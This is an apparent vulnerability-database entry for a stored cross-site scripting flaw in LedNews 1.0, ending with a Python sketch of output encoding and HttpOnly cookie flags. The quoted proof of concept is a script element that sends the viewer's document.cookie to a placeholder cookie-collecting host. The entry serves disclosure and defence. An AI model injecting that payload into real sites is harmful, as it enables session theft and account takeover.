Vendor: LedNews
By: SecurityFocus
CVSS: 8.8 (HIGH)
CWE: 79 (Cross-Site Scripting)
Product Name: LedNews
Affected Version From: LedNews 1.0
Affected Version To: LedNews 1.0
Patch Exists: YES
Related CWE: CVE-2002-0753
CPE: a:lednews:lednews:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

LedNews Cross-Site Scripting Vulnerability

LedNews is vulnerable to Cross-Site Scripting (XSS) attacks due to insufficient input validation. An attacker can inject malicious JavaScript code into a news post, which will be executed when a user views the post. This can be used to steal authentication cookies, redirect users to malicious websites, or perform other malicious activities.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7920/info

It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities. 

<script>
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>
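
The mitigation above, shown as an added example that is not part of the original advisory and is not LedNews code: a Python sketch that renders a stored news post with and without output encoding, using the script element quoted above as constructed sample input. The post fields, the function names and the `session` cookie name are assumptions made for illustration.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: a stored news post whose body carries the script
# element quoted in the advisory (example.com is the page's placeholder host).
SAMPLE_POST = {
    "title": "Site maintenance <b>tonight</b>",
    "author": 'admin" onmouseover="x',
    "body": "<script>\ndocument.location.replace('http://www.example.com/"
            "cgi-bin/cookiemonster.cgi?'+document.cookie);\n</script>",
}

TEMPLATE = ('<div class="post" data-author="%(author)s">'
            '<h2>%(title)s</h2><p>%(body)s</p></div>')


def render_post_unsafe(post):
    """The flaw described above: stored fields are pasted into markup verbatim."""
    return TEMPLATE % post


def render_post_safe(post):
    """Encode every stored field for the HTML context it lands in."""
    # quote=True also encodes " and ', so the attribute value cannot be closed.
    enc = {key: html.escape(value, quote=True) for key, value in post.items()}
    # Line breaks are added only after encoding, so the one tag in the body
    # is the one this renderer wrote itself.
    enc["body"] = enc["body"].replace("\n", "<br>")
    return TEMPLATE % enc


def session_cookie_header(session_id):
    """Defence in depth: HttpOnly keeps the cookie out of document.cookie."""
    cookie = SimpleCookie()
    cookie["session"] = session_id  # hypothetical cookie name
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    print(render_post_unsafe(SAMPLE_POST))
    print(render_post_safe(SAMPLE_POST))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Encoding at output time keeps the stored post intact while the browser treats it as text; the cookie flags limit what a missed encoding bug can reach.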